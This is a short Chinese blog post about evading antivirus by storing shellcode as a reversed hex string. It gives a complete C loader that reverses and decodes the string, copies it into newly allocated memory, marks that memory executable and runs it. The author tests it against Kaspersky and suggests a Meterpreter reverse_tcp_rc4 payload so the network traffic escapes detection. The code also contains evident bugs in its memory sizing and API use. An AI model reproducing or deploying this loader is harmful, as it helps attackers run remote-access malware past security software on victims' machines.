反转字符串绕杀软
我也不想写什么花里胡哨的东西,就让我水一篇吧。
为了节省我们的时间就随便加一个能自动化实现的shellcode混淆方式(偷懒,手动狗头),就直接添加一个字符串翻转吧。
直接python一行代码翻转字符串。

在加载器内翻转字符串。
int p = 0;
for (int i = strlen(str) - 1; i >= 0; i--)
{
temp[p++] = str[i];
}
然后执行老哥的ssi,这里遇到一个坑,tm的vc6根本没有malloc(略略略)。
然后请出我们的卡巴斯基。

虽然我们古典主义脚本小子特别喜欢弹窗(更多时候弹calc), 这里我们再测一下Meterpreter。
防止在流量检测的时候被杀掉,我们使用windows/meterpreter/reverse_tcp_rc4这个payload。


略略略。
// hex.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
int main(int argc, char* argv[]) {
char *str = argv[1];
unsigned int char_in_hex;
unsigned int iterations = strlen(str);
unsigned int memory_allocation = strlen(str) / 2;
char* temp = (char*)VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
int p = 0;
for (int i = strlen(str) - 1; i >= 0; i--)
{
temp[p++] = str[i];
}
char* shellcode = (char*)temp;
for (i = 0; i < iterations - 1; i++) {
sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
shellcode[i] = (char)char_in_hex;
}
void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
memcpy(exec, shellcode, memory_allocation);
VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, NULL);
(*(void (*WINAPI)()) exec)();
return 0;
}
最近更新 3yr ago